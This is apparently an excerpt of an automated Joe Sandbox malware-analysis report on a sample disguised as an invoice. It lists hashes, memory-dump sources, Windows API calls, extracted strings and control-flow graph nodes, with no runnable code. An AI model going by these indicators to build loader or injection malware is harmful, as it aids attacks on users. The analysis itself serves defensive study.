                                  • Opcode Fuzzy Hash: e68a964213fd862a97bb1afed85ec415932d6422eb181d9354e6072a842318d1
                                  • Instruction Fuzzy Hash: 0C1137B19002499FCB10DFAAC845ADFBFF5EF88324F208419E519A7250C775A954CFA5
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1693766598.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: c5eb69a41f124339a678d334c531b572c6ddee9fdb7500249fb067a320284d49
                                  • Instruction ID: 3683b9d43b5fe8afb20ca2083ccb692cfffdafdfc8bd3b6b0281b5f77a0db137
                                  • Opcode Fuzzy Hash: c5eb69a41f124339a678d334c531b572c6ddee9fdb7500249fb067a320284d49
                                  • Instruction Fuzzy Hash: 7E1119B5D003498FDB10DFAAC4457DEFBF5AB88324F108419D919A7240CA79A945CB95
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1693766598.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: a81ace1e8ef853972ee4612cee72e0a23532b016601446a1830c0e186cb5e1f5
                                  • Instruction ID: 8fc875729670e5b7b09a9ec6df24a4456d274e36e205135775e9dc5f5fe0423b
                                  • Opcode Fuzzy Hash: a81ace1e8ef853972ee4612cee72e0a23532b016601446a1830c0e186cb5e1f5
                                  • Instruction Fuzzy Hash: E91125B1D003498FDB10DFAAC44579EFBF9EB88324F208819D519A7240CA79A944CBA5
                                  APIs
                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 070E6EF5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1693766598.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: 58b272a5c8538913e442c5ecebf3f1af1df63a98f0cba13dca084b898156aeae
                                  • Instruction ID: 43cc6cd82119d0cd8267a1d14f162c03da14ed4f424077c184e6e7adf7768989
                                  • Opcode Fuzzy Hash: 58b272a5c8538913e442c5ecebf3f1af1df63a98f0cba13dca084b898156aeae
                                  • Instruction Fuzzy Hash: 4D11F2B58003499FDB10DF9AD849BDEBBF8EB58324F108459E918A7350C376A944CFA5
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00D6AFFE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1689604915.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d60000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: 97e8dd98109915ba6222dc1ed324b7ef6aba4b23668d20af0dd7623acd6fd72e
                                  • Instruction ID: 4a1bc393d0638342dd21b079727395b11c3683a8f58be141ebe087352ad6b1c6
                                  • Opcode Fuzzy Hash: 97e8dd98109915ba6222dc1ed324b7ef6aba4b23668d20af0dd7623acd6fd72e
                                  • Instruction Fuzzy Hash: 80110FB5C003498FCB10DF9AC444A9EFBF4AB88324F14841AD429A7210C379A545CFA1
                                  APIs
                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 070E6EF5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1693766598.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: 29a18857ecd6a87c6cd2bceb4ae7f308c2f268c3cb3490e4434dca90d52de70e
                                  • Instruction ID: ffddfe2e04f025e73e99f9dfb666975d3863858be49c423d88b8387b0554cf14
                                  • Opcode Fuzzy Hash: 29a18857ecd6a87c6cd2bceb4ae7f308c2f268c3cb3490e4434dca90d52de70e
                                  • Instruction Fuzzy Hash: A611F2B58002499FCB10DF99D544BDEBBF8EB48314F10841AE518A7640C379A544CFA1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1688425022.00000000008BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008BD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8bd000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 10b3e6a9ba83a03b50e08e5d70ad983ccd720572d241ca53f045b40e9f0f4a48
                                  • Instruction ID: 1b795e071aba4efbf713fe749ea3499e220c15925c2993b9a8401a4331205603
                                  • Opcode Fuzzy Hash: 10b3e6a9ba83a03b50e08e5d70ad983ccd720572d241ca53f045b40e9f0f4a48
                                  • Instruction Fuzzy Hash: 2521F275604704EFCB14EF14D9C4B66BBA5FB98324F24C96DD80A8B386D33AD807CA61
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1688425022.00000000008BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008BD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8bd000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4c47d214d78234b52e3c0eb5bddf1f6fe6d797dac503d927ab049b26e42edf3c
                                  • Instruction ID: efb02f4ddccd23ead641100d7def1e6d4f7b0b56defd31d17efac3412627be80
                                  • Opcode Fuzzy Hash: 4c47d214d78234b52e3c0eb5bddf1f6fe6d797dac503d927ab049b26e42edf3c
                                  • Instruction Fuzzy Hash: 2521F575604344EFDB05DF14D9C4B65BBA5FB94318F24C66DD80A8B392D336E806CB61
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1688425022.00000000008BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008BD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8bd000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 570e729502aab2fe5eb52bd119d2482a58cd18629ab6daf737da151a2c2d79cd
                                  • Instruction ID: 5d10db573b1a995d40c1407869caa69f4ef4c9f5c7c41e541dab95d926c7a86f
                                  • Opcode Fuzzy Hash: 570e729502aab2fe5eb52bd119d2482a58cd18629ab6daf737da151a2c2d79cd
                                  • Instruction Fuzzy Hash: 622180755087809FCB02DF14D994B11BFB1FB46314F28C5EAD8498F2A7D33A981ACB62
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1688425022.00000000008BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008BD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8bd000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                  • Instruction ID: 172bfbe34f7cf68ecb2fab27c60a191ec54482b52849bafea4e7ccdbee5265c4
                                  • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                  • Instruction Fuzzy Hash: B111A975904280EFCB02CF10C5C4B15BBA2FB84324F24C6A9D8498B396C33AE80ACB61
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1693766598.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: PH^q$PH^q
                                  • API String ID: 0-1598597984
                                  • Opcode ID: c912e9ab9e7fbcd4cc499dd88e28d1140c103a313315bc7fb151e6c096be91ee
                                  • Instruction ID: bd5d82f311d77a25e703fdfa97da1de31f65ff48025feb159766ebb96222d63b
                                  • Opcode Fuzzy Hash: c912e9ab9e7fbcd4cc499dd88e28d1140c103a313315bc7fb151e6c096be91ee
                                  • Instruction Fuzzy Hash: FCD1C3B4A00605CFDB48CF69C598AA9B7F5BF4D301F2591A9E406AB3B1DB31AD40CF60
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1693766598.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c18b7a79f863515bb13cd76e4ea727ec0e77f988423487755ba6ebc4d4d08927
                                  • Instruction ID: c7744d45e516d823a903362a8d4dac8a0f002ac95cf236deafd5540884de097e
                                  • Opcode Fuzzy Hash: c18b7a79f863515bb13cd76e4ea727ec0e77f988423487755ba6ebc4d4d08927
                                  • Instruction Fuzzy Hash: 6CE1D9B4E001198FCB14DFA9C9909AEFBF6BF89305F24C269D514AB359D730A941CF61
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1693766598.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b66bff5059b2985b508d4bdcde4acd78c3ca4cb9796b75f45145d7a2887b26e6
                                  • Instruction ID: 32c364d6913b4986f42e8b378822f76fa6d43cb31482849c0db033a1adcd08b3
                                  • Opcode Fuzzy Hash: b66bff5059b2985b508d4bdcde4acd78c3ca4cb9796b75f45145d7a2887b26e6
                                  • Instruction Fuzzy Hash: 9AE1E8B4E005198FCB14DFA9C5909AEFBF6BF89305F24C269D414AB359DB30A941CFA1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1693766598.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 76431590a5b80bb35858ab130b47b3a2b542734f01007d18870a1efb54c135f0
                                  • Instruction ID: 64109bd36f4b5ad9a1f52e36e7f0b44eed2c9fe779742d88c36531a101ad6ec4
                                  • Opcode Fuzzy Hash: 76431590a5b80bb35858ab130b47b3a2b542734f01007d18870a1efb54c135f0
                                  • Instruction Fuzzy Hash: 4FE1D5B4E001198FCB14DFA9C5809AEFBF6BF89305F248269D415AB359DB30A941CFA1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1693766598.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: da79063247a976fea600168cc0dcb36ee221d6e15c56db9c4ebb790e3f6ae50f
                                  • Instruction ID: 0e8fe808891e5db9f8ad6890580b847b401d5e971d49b46bec877a4e2334dfdb
                                  • Opcode Fuzzy Hash: da79063247a976fea600168cc0dcb36ee221d6e15c56db9c4ebb790e3f6ae50f
                                  • Instruction Fuzzy Hash: D5E1EAB4E001598FCB14DFA9C5809AEFBF6FF89305F248269E814AB356D730A945CF61
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1693766598.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fca8c003fdffbeb871bc47bc5038c23bf717b0ae56cda7777fd25997e83c24f3
                                  • Instruction ID: f695f65048c0fa44525ad691b9019bfd7d8d8ec816bfa3159492bdd233c534af
                                  • Opcode Fuzzy Hash: fca8c003fdffbeb871bc47bc5038c23bf717b0ae56cda7777fd25997e83c24f3
                                  • Instruction Fuzzy Hash: C0E1D7B4E041198FCB14DFA9C5909AEFBF6BF89305F248269D414AB359DB30A941CFA1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1689604915.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d60000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a3e25aa8096df98513c9d495858c0c1467a7a2e5006bb2a8cf96436952d30b00
                                  • Instruction ID: cae7e37ebfb6a8647eb9d1315b3245171f16c1705490900cdbaa49c2b786414c
                                  • Opcode Fuzzy Hash: a3e25aa8096df98513c9d495858c0c1467a7a2e5006bb2a8cf96436952d30b00
                                  • Instruction Fuzzy Hash: 37A14A36E00609CFCF05DFA4D88059EB7B2FF89300B1585BAE805AB265DB75E915CBA0

                                  Execution Graph

                                  Execution Coverage:1.2%
                                  Dynamic/Decrypted Code Coverage:5.1%
                                  Signature Coverage:8%
                                  Total number of Nodes:138
                                  Total number of Limit Nodes:8

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 89 4172f3-41730f 90 417317-41731c 89->90 91 417312 call 42ed93 89->91 92 417322-417330 call 42f393 90->92 93 41731e-417321 90->93 91->90 96 417340-417351 call 42d723 92->96 97 417332-41733d call 42f633 92->97 102 417353-417367 LdrLoadDll 96->102 103 41736a-41736d 96->103 97->96 102->103
                                  APIs
                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417365
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2239761495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: 6555885b03e424912a974b2ad71a9bf35cbf2a7f4b5f4a85ec69b3e21490f823
                                  • Instruction ID: d0811db12d0f146c06d79ceb3f2dab9860b08131f12c425baa9d12ee8bf14660
                                  • Opcode Fuzzy Hash: 6555885b03e424912a974b2ad71a9bf35cbf2a7f4b5f4a85ec69b3e21490f823
                                  • Instruction Fuzzy Hash: 720152B1E0010DA7DB10DAE1DC42FDEB3789B54308F4041AAED1897240F634EB49CB55

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 109 42bff3-42c02f call 4047d3 call 42d233 NtClose
                                  APIs
                                  • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C02A
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2239761495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: c34ef89e7b9cdae7ad94ebfb894588efeabc20d9fa43539f963b23359dc65b50
                                  • Instruction ID: 155e8618e93c42cb7bf45a07eaa79e030e7167f9385490bd2c7e5f42732bba29
                                  • Opcode Fuzzy Hash: c34ef89e7b9cdae7ad94ebfb894588efeabc20d9fa43539f963b23359dc65b50
                                  • Instruction Fuzzy Hash: 8BE04F766002147BD220AA5ADC42FDB776DDFC5714F40441AFA086B241C775B91186F5

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 123 1a52b60-1a52b6c LdrInitializeThunk
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 963c3f9bcc5d07a542c4337f73f94a8cf56b407463903b86c45559305d1a7e02
                                  • Instruction ID: f99dbf45330a9d6541f5a0d786528dbc763c334c7312451f74022077f878e627
                                  • Opcode Fuzzy Hash: 963c3f9bcc5d07a542c4337f73f94a8cf56b407463903b86c45559305d1a7e02
                                  • Instruction Fuzzy Hash: 7F9002A12025000341057158441461A400E97F0201F56C021E5014590DC52989916225

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 125 1a52df0-1a52dfc LdrInitializeThunk
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 9d2b6944517bb0fc15490213fe4284bddcd62861a4f005b9b4c5aaabf965169a
                                  • Instruction ID: 069dfe20283047bd95c30dfda9ef109241a7c5bbf036ecf7162b3d65c738108a
                                  • Opcode Fuzzy Hash: 9d2b6944517bb0fc15490213fe4284bddcd62861a4f005b9b4c5aaabf965169a
                                  • Instruction Fuzzy Hash: 5390027120150413D1117158450470B000D97E0241F96C412A4424558DD65A8A52A221

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 124 1a52c70-1a52c7c LdrInitializeThunk
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: e93ea0af7f1274f3f80b29110ec9358a5ef318a8798f14f8708c678ba452e12e
                                  • Instruction ID: 507328234a6d25b41ea43eb735ebfd3258d4965db63bb2e8b0a305417978d97b
                                  • Opcode Fuzzy Hash: e93ea0af7f1274f3f80b29110ec9358a5ef318a8798f14f8708c678ba452e12e
                                  • Instruction Fuzzy Hash: 5B90027120158802D1107158840474E000D97E0301F5AC411A8424658DC69989917221

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 126 1a535c0-1a535cc LdrInitializeThunk
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 6eb2d5abc27aa77c87d365667902295b5a83206261a69ff901c15f1a0ec4397c
                                  • Instruction ID: 9ef902c59e45d9fa6c9e292060b9602c7f807a9482a7405a8d9b49d2d7a09550
                                  • Opcode Fuzzy Hash: 6eb2d5abc27aa77c87d365667902295b5a83206261a69ff901c15f1a0ec4397c
                                  • Instruction Fuzzy Hash: 0A90027160560402D1007158451470A100D97E0201F66C411A4424568DC7998A5166A2

                                  Control-flow Graph

                                  APIs
                                  • PostThreadMessageW.USER32(297268BLQ,00000111,00000000,00000000), ref: 00413C0D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2239761495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID: 297268BLQ$297268BLQ
                                  • API String ID: 1836367815-2296095138
                                  • Opcode ID: 1af129441032b496bd40eed0ce9d410f271536bea43bc203cbba9472e8e933f1
                                  • Instruction ID: 9fee5f7370640ccb0f943e733cf75d796cd6401a56ad5369163ceaf19d72f062
                                  • Opcode Fuzzy Hash: 1af129441032b496bd40eed0ce9d410f271536bea43bc203cbba9472e8e933f1
                                  • Instruction Fuzzy Hash: 9A114872E402187AEB20DA91CC02FDEBB78DF81B10F044059FA007B280E7B867028BD9

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 14 413b93-413ba3 15 413bac-413bfe call 42eb43 call 4172f3 call 404743 call 424903 14->15 16 413ba7 call 42e133 14->16 25 413c20-413c25 15->25 26 413c00-413c11 PostThreadMessageW 15->26 16->15 26->25 27 413c13-413c1d 26->27 27->25
                                  APIs
                                  • PostThreadMessageW.USER32(297268BLQ,00000111,00000000,00000000), ref: 00413C0D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2239761495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID: 297268BLQ$297268BLQ

                                  Control-flow Graph

                                  control_flow_graph 28 42c363-42c3a4 call 4047d3 call 42d233 RtlFreeHeap
                                  APIs
                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042C39F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2239761495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID: D`A

                                  Control-flow Graph

                                  control_flow_graph 104 42c313-42c357 call 4047d3 call 42d233 RtlAllocateHeap
                                  APIs
                                  • RtlAllocateHeap.NTDLL(?,0041E081,?,?,00000000,?,0041E081,?,?,?), ref: 0042C352
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2239761495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:

                                  Control-flow Graph

                                  control_flow_graph 114 42c3b3-42c3ec call 4047d3 call 42d233 ExitProcess
                                  APIs
                                  • ExitProcess.KERNEL32(?,00000000,00000000,?,F3121F26,?,?,F3121F26), ref: 0042C3E7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2239761495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID:

                                  Control-flow Graph

                                  control_flow_graph 119 1a52c0a-1a52c0f 120 1a52c11-1a52c18 119->120 121 1a52c1f-1a52c26 LdrInitializeThunk 119->121
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                  Strings
                                  • undeleted critical section in freed memory, xrefs: 01A8542B
                                  • double initialized or corrupted critical section, xrefs: 01A85508
                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01A854E2
                                  • 8, xrefs: 01A852E3
                                  • Critical section debug info address, xrefs: 01A8541F, 01A8552E
                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01A854CE
                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01A8540A, 01A85496, 01A85519
                                  • Thread is in a state in which it cannot own a critical section, xrefs: 01A85543
                                  • Address of the debug info found in the active list., xrefs: 01A854AE, 01A854FA
                                  • Critical section address, xrefs: 01A85425, 01A854BC, 01A85534
                                  • Critical section address., xrefs: 01A85502
                                  • Thread identifier, xrefs: 01A8553A
                                  • corrupted critical section, xrefs: 01A854C2
                                  • Invalid debug info address of this critical section, xrefs: 01A854B6
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                  Strings
                                  • @, xrefs: 01A8259B
                                  • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01A82412
                                  • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 01A822E4
                                  • RtlpResolveAssemblyStorageMapEntry, xrefs: 01A8261F
                                  • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01A82409
                                  • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01A82602
                                  • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01A82506
                                  • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01A82498
                                  • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 01A824C0
                                  • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01A82624
                                  • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 01A825EB
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
